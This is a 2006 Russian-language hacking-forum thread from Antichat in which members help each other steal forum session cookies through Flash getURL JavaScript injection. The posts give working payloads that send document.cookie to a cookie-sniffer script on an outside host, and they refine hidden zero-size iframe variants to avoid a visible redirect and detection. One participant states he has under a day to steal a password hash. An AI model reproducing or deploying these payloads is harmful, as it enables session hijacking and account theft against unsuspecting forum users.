HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 30.08.2006, 21:01
ReanimatoR
Участник форума
Регистрация: 27.08.2006
Сообщений: 223
С нами: 10371202

Репутация: 341
По умолчанию

getURL("javascript:location.replace('http://www.mountainboard.ru/cgi/sniff.cgi?'+document.cookie)")
я сделал так...но как возвращать ту же страницу в сниффере?() а то там открывается новая print "Location: ****";(или написать там $ref) Но тогда эта вся байда зациклица=()
 
Ответить с цитированием

  #12  
Старый 28.12.2006, 23:59
Thanat0z
Постоянный
Регистрация: 06.12.2006
Сообщений: 762
С нами: 10225766

Репутация: 2062


По умолчанию

как сделать чтоб не было редиректа, а то это слишком палевно.
И кстати в Опере не работает, у кого какие идеи будут?

ЗЫ Реаниматор - ящик у тебя забит
 
Ответить с цитированием

  #13  
Старый 29.12.2006, 18:51
def_
Новичок
Регистрация: 30.08.2006
Сообщений: 16
С нами: 10366612

Репутация: 18
По умолчанию

ajax должен помочь
 
Ответить с цитированием

  #14  
Старый 29.12.2006, 19:10
Thanat0z
Постоянный
Регистрация: 06.12.2006
Сообщений: 762
С нами: 10225766

Репутация: 2062


По умолчанию

ajax? а подробней, и пример желателен у меня осталось менее суток чтоб украсть хеш и найти пароль
 
Ответить с цитированием

  #15  
Старый 29.12.2006, 20:02
def_
Новичок
Регистрация: 30.08.2006
Сообщений: 16
С нами: 10366612

Репутация: 18
По умолчанию

http://www.yandex.ru/yandsearch?text=ajax&stype=www


вот еще способ обратиться по нужному адресу, работает в опере и ИЕ, в лисе не знаю.
в отличие от img= new Image();........ не палится ослом:
PHP код:
document.write('<iframe src="http://127.0.0.1/pixcb.php" id="lnk" width="0" height="0"></iframe><script>lnk.click()</script>'); 

Последний раз редактировалось def_; 29.12.2006 в 20:06..
 
Ответить с цитированием

  #16  
Старый 29.12.2006, 23:23
Thanat0z
Постоянный
Регистрация: 06.12.2006
Сообщений: 762
С нами: 10225766

Репутация: 2062


По умолчанию

PHP код:
document.write('<iframe src="http://127.0.0.1/pixcb.php" id="lnk" width="0" height="0"></iframe><script>lnk.click()</script>'); 
блин, сто лет с пхп не работал:

Notice: Use of undefined constant document - assumed 'document' in z:\home\localhost\www\d\swf3.php on line 2
Fatal error: Call to undefined function: write() in z:\home\localhost\www\d\swf3.php on line 2


что оно от меня хочет? обьявить константу? как? и что-то я не понимаю как это мне заюзать
 
Ответить с цитированием

  #17  
Старый 29.12.2006, 23:26
Talisman
Постоянный
Регистрация: 22.04.2006
Сообщений: 566
С нами: 10554411

Репутация: 517


По умолчанию

Цитата:
Сообщение от Thanat0z  
PHP код:
document.write('<iframe src="http://127.0.0.1/pixcb.php" id="lnk" width="0" height="0"></iframe><script>lnk.click()</script>'); 
блин, сто лет с пхп не работал:

Notice: Use of undefined constant document - assumed 'document' in z:\home\localhost\www\d\swf3.php on line 2
Fatal error: Call to undefined function: write() in z:\home\localhost\www\d\swf3.php on line 2


что оно от меня хочет? обьявить константу? как? и что-то я не понимаю как это мне заюзать
это не пшп код, это джава-скрипт код, а вставлен в тег пшп для удобства читабельности на форуме. просто вставляй как жс
 
Ответить с цитированием

  #18  
Старый 29.12.2006, 23:42
Thanat0z
Постоянный
Регистрация: 06.12.2006
Сообщений: 762
С нами: 10225766

Репутация: 2062


По умолчанию

блин, я сначала отрабатываю на локал файлах, а потом уже тестю на форуме, так что скажите просто как и что куда вставлять, я запутался уже. Речь шла о флешке, потом дали мне пхп код с явакспиртом внутри, теперь говорят вставляй это в Js )))

Я уже ничего не понимаю.
Давайт по порядку

1) есть форум, в нем месаджи, моя подпись, аватар
2) есть код скрипта
3) есть снифер

Значит я должен вставтить код
1) в подпись в чистом виде
2) вставить в пост в чистом виде
3) заныкать его в "коды" форума
4) присоеденить через уже известные коды при этом линк будет на удаленный Js файл

Последний раз редактировалось Thanat0z; 29.12.2006 в 23:44..
 
Ответить с цитированием

  #19  
Старый 30.12.2006, 04:50
def_
Новичок
Регистрация: 30.08.2006
Сообщений: 16
С нами: 10366612

Репутация: 18
По умолчанию

у тя был вопрос как сделать без редиректа и вообщ без палева отсылку куков на снифер, этот пример именно это и делает
пользоваться так:
код вставляешь в своем swf файле в getUrl("javascript: ");
все вставлено в яваскриптовский document.write потомучто iframe это не js, а html
 
Ответить с цитированием

  #20  
Старый 30.12.2006, 05:29
Thanat0z
Постоянный
Регистрация: 06.12.2006
Сообщений: 762
С нами: 10225766

Репутация: 2062


По умолчанию

пробывал такое
Код:
getUrl('javascript:document.write(\'<iframe src="http://localhost/s/s.php?"+document.cookie id="lnk" width="0" height="0"></iframe><script>lnk.click()</script>\');');
и такое
Код:
getUrl('javascript:var cook; cook = document.cookie; document.write(\'<iframe src="http://localhost/s/s.php"\'+cook+\' id="lnk" width="0" height="0"></iframe>\');lnk.click();');

В обоих случаях чистый ивент в снифер, и пустая страничка темы куда это закинули, то есть редирект таки остался. Кто чем поможет?

ЗЫ очень важно что кавычки в конце и начале одинарные, то есть getUrl('javascript

Последний раз редактировалось Thanat0z; 15.01.2007 в 18:25..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Подборка уязвимостей phpBB -=ka$at1k=- Уязвимости CMS / форумов 3 02.07.2006 15:26
Уязвимость на сайте Ponchik Уязвимости 12 27.04.2006 13:34
Есть ли уязвимость в форумах созданных на http://www.1bb.ru/ ? bike Уязвимости CMS / форумов 2 24.12.2005 17:28
Уязвимость WZC в Windows XP DRON-ANARCHY Мировые новости. Обсуждения. 5 10.10.2005 23:16
Уязвимость в iChat'е. -SX- Болталка 0 15.01.2005 23:46



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.